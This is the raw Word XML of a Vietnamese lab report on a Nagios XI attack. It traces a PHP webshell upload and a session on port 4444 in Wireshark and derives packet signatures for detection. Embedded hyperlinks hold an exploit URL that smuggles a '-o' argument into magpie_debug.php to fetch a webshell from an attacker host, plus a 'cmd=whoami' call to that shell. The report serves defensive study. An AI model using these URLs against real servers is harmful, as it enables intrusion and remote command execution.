        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074528">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSRVHOST: là địa chỉ server để upload file php đến server Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB48BA" w14:textId="01AC37C1" w:rsidR="0028379F" w:rsidRDefault="00876E7D" w:rsidP="00876E7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67ADC355" wp14:editId="6893673D">
            <wp:extent cx="3009900" cy="21458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30348" cy="2160458"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3A2E8" w14:textId="71835ED3" w:rsidR="009B1C9B" w:rsidRDefault="00507CF9" w:rsidP="009B1C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507CF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sửng dụng 1 URL từ máy Actacker để upload file .php lên server Victim, có 2 file được tải lên với URL khác nhau. Sau khi hoàn thành sẽ tạo 1 session để kết nối vào máy Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93EC12" w14:textId="77777777" w:rsidR="006F0729" w:rsidRPr="00DF1C82" w:rsidRDefault="006F0729" w:rsidP="006F0729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1C82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thực hiện thử các lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9AD1A" w14:textId="450BC30B" w:rsidR="006F0729" w:rsidRDefault="0044407B" w:rsidP="008E668D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE79FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32B0C5D9" wp14:editId="0903E24A">
            <wp:extent cx="2819245" cy="2232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52421" cy="2258933"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F466525" w14:textId="21C12065" w:rsidR="00F12801" w:rsidRDefault="0063536C" w:rsidP="00F12801">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0063536C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sử dụng Wireshark để bắt các gói trong quá trình tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904986A" w14:textId="45762B34" w:rsidR="001F6F10" w:rsidRDefault="001F6F10" w:rsidP="001F6F10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005105CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09290508" wp14:editId="2A4C2B34">
            <wp:extent cx="5698378" cy="1638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1262" cy="1644879"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61644DD8" w14:textId="3140AA78" w:rsidR="00C45B47" w:rsidRDefault="00D4513E" w:rsidP="00D4513E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4513E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phân tích các gói</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D88A40" w14:textId="18742A30" w:rsidR="004E42B7" w:rsidRDefault="00BF0716" w:rsidP="00BF0716">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002858F9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FAB7C3" wp14:editId="6304132C">
            <wp:extent cx="5731510" cy="12350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235075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83445C" w14:textId="57865BE7" w:rsidR="006E20B9" w:rsidRDefault="00C70232" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70232">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đầu tiên máy Atacker sẽ truy cập đến domain của server Victim qua port 443 (https) và Actacker sẽ tạo port ngẫu nhiên để tránh phát hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58808C27" w14:textId="45565CF3" w:rsidR="004A069B" w:rsidRPr="00FA7CE5" w:rsidRDefault="004A069B" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các gói upload file .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D389EA9" w14:textId="0006011E" w:rsidR="00E64DAE" w:rsidRDefault="00E64DAE" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4E5E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49AB7EC9" wp14:editId="3279D21F">
            <wp:extent cx="5731510" cy="1162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162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01658F74" w14:textId="615335ED" w:rsidR="00F75919" w:rsidRDefault="00F75919" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00045FF6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18EE1456" wp14:editId="4D7E3BBA">
            <wp:extent cx="5731510" cy="11715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171575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048B2DE" w14:textId="4EE513FD" w:rsidR="00DC6194" w:rsidRDefault="00DC6194" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6194">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các gói sinh ra trong quá trình tải lên file .php từ máy Actacker đến máy Victim, do có  2 file .php được gửi nên sinh ra 2 phần. Máy Actacker sẽ tải từ port 8080 đến port ngẫu nhiên của máy Victim, port Actacker có thể thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1AC4A6" w14:textId="77777777" w:rsidR="00973262" w:rsidRDefault="00973262">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C9E29" w14:textId="1743C64A" w:rsidR="00A60506" w:rsidRPr="00F62F2F" w:rsidRDefault="00A60506" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cái gói sinh ra trong quá trình kết nối 2 máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F73EBD0" w14:textId="080037D9" w:rsidR="00AF1101" w:rsidRDefault="00AF1101" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6499F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D7A5F2E" wp14:editId="69385E56">
            <wp:extent cx="5731510" cy="13576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357630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B46DE" w14:textId="6CBA8288" w:rsidR="00103FE5" w:rsidRDefault="00103FE5" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103FE5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Máy Atacker sẽ kết nối từ port 4444 đến port ngẫu nhiên trên máy Victim, có từ 1000-2000 gói được gửi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C25432" w14:textId="77777777" w:rsidR="00CB6C8A" w:rsidRPr="00F62F2F" w:rsidRDefault="00CB6C8A" w:rsidP="00CB6C8A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các gói sinh ra từ các lệnh test cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E9A42" w14:textId="2CFCFBC1" w:rsidR="00CB6C8A" w:rsidRDefault="005355ED" w:rsidP="00C44851">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5D15">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FCF325" wp14:editId="37007BA2">
            <wp:extent cx="5731510" cy="10248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024890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="489645F9" w14:textId="77777777" w:rsidR="00952025" w:rsidRDefault="00952025" w:rsidP="00952025">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD69B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác định signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B50DC" w14:textId="616E1F0D" w:rsidR="00B44414" w:rsidRPr="00754DBA" w:rsidRDefault="00B44414" w:rsidP="00B44414">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754DBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong mỗi lần gửi file .php đều sinh ra gói</w:t>
      </w:r>
      <w:r w:rsidR="00754DBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00754DBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[SYN] và win=64240 từ máy Actacker -&gt; Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA0009" w14:textId="0B994058" w:rsidR="00B44414" w:rsidRPr="00754DBA" w:rsidRDefault="00B44414" w:rsidP="00754DBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754DBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Victim -&gt; Atacker sẽ trả ra gói [SYN, ACK] và win=28960</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E01356" w14:textId="7D521BBB" w:rsidR="00B44414" w:rsidRPr="001E4105" w:rsidRDefault="00B44414" w:rsidP="001E4105">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4105">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gửi file .php từ Actacker-&gt;Victim qua port 8080 nhưng port này có thể thay đổi nên không chọn làm key, chọn [SYN] và win=29200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052E273" w14:textId="071F3174" w:rsidR="00C723D1" w:rsidRDefault="00B44414" w:rsidP="00430E11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430E11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Victim -&gt; Atacker sẽ trả ra gói [SYN, ACK] và win=65160</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6AFE4" w14:textId="77777777" w:rsidR="00FC5AD9" w:rsidRDefault="00FC5AD9" w:rsidP="00FC5AD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6270">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong quá trình tạo session sẽ gửi 1000-2000 từ má</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y Actacker-&gt;Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8E7EF" w14:textId="37898C53" w:rsidR="00FC5AD9" w:rsidRPr="0089565C" w:rsidRDefault="00FC5AD9" w:rsidP="0089565C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[ACK] và win=65280</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC5AD9" w:rsidRPr="0089565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1E6C28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE8A5E6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565C4500"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D3CB4C4"/>
    <w:lvl w:ilvl="0" w:tplc="AF5036AE">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6B9744C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CA68E12"/>
    <w:lvl w:ilvl="0" w:tplc="FB8CB17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569613360">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="807550305">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="20691798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6D48C2"/>
    <w:rsid w:val="00030797"/>
    <w:rsid w:val="00074528"/>
    <w:rsid w:val="000A7C27"/>
    <w:rsid w:val="000B49D6"/>
    <w:rsid w:val="000D2D27"/>
    <w:rsid w:val="000D3212"/>
    <w:rsid w:val="000D5016"/>
    <w:rsid w:val="000E55CA"/>
    <w:rsid w:val="00100BD4"/>
    <w:rsid w:val="00103FE5"/>
    <w:rsid w:val="00120DE9"/>
    <w:rsid w:val="00137B2D"/>
    <w:rsid w:val="00192CF9"/>
    <w:rsid w:val="001B439F"/>
    <w:rsid w:val="001C6D62"/>
    <w:rsid w:val="001E4105"/>
    <w:rsid w:val="001F6F10"/>
    <w:rsid w:val="002824C0"/>
    <w:rsid w:val="0028379F"/>
    <w:rsid w:val="00297DBA"/>
    <w:rsid w:val="00314FB9"/>
    <w:rsid w:val="003240C3"/>
    <w:rsid w:val="003535CE"/>
    <w:rsid w:val="00362049"/>
    <w:rsid w:val="00430E11"/>
    <w:rsid w:val="0044407B"/>
    <w:rsid w:val="00480C91"/>
    <w:rsid w:val="004A069B"/>
    <w:rsid w:val="004D561A"/>
    <w:rsid w:val="004E42B7"/>
    <w:rsid w:val="00507CF9"/>
    <w:rsid w:val="005355ED"/>
    <w:rsid w:val="005468DF"/>
    <w:rsid w:val="0059142F"/>
    <w:rsid w:val="005C13E1"/>
    <w:rsid w:val="0063536C"/>
    <w:rsid w:val="006737B6"/>
    <w:rsid w:val="006919C7"/>
    <w:rsid w:val="006B73D0"/>
    <w:rsid w:val="006D48C2"/>
    <w:rsid w:val="006E20B9"/>
    <w:rsid w:val="006F0729"/>
    <w:rsid w:val="00715380"/>
    <w:rsid w:val="00754DBA"/>
    <w:rsid w:val="0076494A"/>
    <w:rsid w:val="00787476"/>
    <w:rsid w:val="007D0AAF"/>
    <w:rsid w:val="00825A5C"/>
    <w:rsid w:val="00876E7D"/>
    <w:rsid w:val="0089565C"/>
    <w:rsid w:val="0089765B"/>
    <w:rsid w:val="008E668D"/>
    <w:rsid w:val="0091014B"/>
    <w:rsid w:val="00952025"/>
    <w:rsid w:val="0096176B"/>
    <w:rsid w:val="009653C6"/>
    <w:rsid w:val="00973262"/>
    <w:rsid w:val="00987668"/>
    <w:rsid w:val="009B1C9B"/>
    <w:rsid w:val="00A20610"/>
    <w:rsid w:val="00A60506"/>
    <w:rsid w:val="00A90108"/>
    <w:rsid w:val="00A97C74"/>
    <w:rsid w:val="00AF1101"/>
    <w:rsid w:val="00B44414"/>
    <w:rsid w:val="00B46931"/>
    <w:rsid w:val="00BD0DD9"/>
    <w:rsid w:val="00BF0716"/>
    <w:rsid w:val="00C44851"/>
    <w:rsid w:val="00C45B47"/>
    <w:rsid w:val="00C70232"/>
    <w:rsid w:val="00C723D1"/>
    <w:rsid w:val="00CB5353"/>
    <w:rsid w:val="00CB6C8A"/>
    <w:rsid w:val="00CC5E82"/>
    <w:rsid w:val="00D12B6C"/>
    <w:rsid w:val="00D311CD"/>
    <w:rsid w:val="00D4513E"/>
    <w:rsid w:val="00DB3C5F"/>
    <w:rsid w:val="00DC6194"/>
    <w:rsid w:val="00E35A59"/>
    <w:rsid w:val="00E4680A"/>
    <w:rsid w:val="00E61B4B"/>
    <w:rsid w:val="00E64DAE"/>
    <w:rsid w:val="00E76715"/>
    <w:rsid w:val="00E928CB"/>
    <w:rsid w:val="00EE0D43"/>
    <w:rsid w:val="00EE2A1C"/>
    <w:rsid w:val="00F12801"/>
    <w:rsid w:val="00F456C2"/>
    <w:rsid w:val="00F62F2F"/>
    <w:rsid w:val="00F75919"/>
    <w:rsid w:val="00FA53B6"/>
    <w:rsid w:val="00FA7CE5"/>
    <w:rsid w:val="00FC5AD9"/>
    <w:rsid w:val="00FE3A3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60"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val=","/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="7B173FF5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A2702716-9A74-44F2-8974-5F2CD4F920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6931"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B46931"/>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7D0AAF"/>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0DD9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B46931"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D0AAF"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E35A59"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E35A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7629701">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="680548281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1656951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wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.1.208/nagvis/exec.php?cmd=whoami" TargetMode="External"/><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192.168.1.208/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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5</Pages>
  <Words>656</Words>
  <Characters>3742</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4390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Khánh Duy Lê</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Khánh Duy Lê</cp:lastModifiedBy>
  <cp:revision>94</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-22T14:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-23T11:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>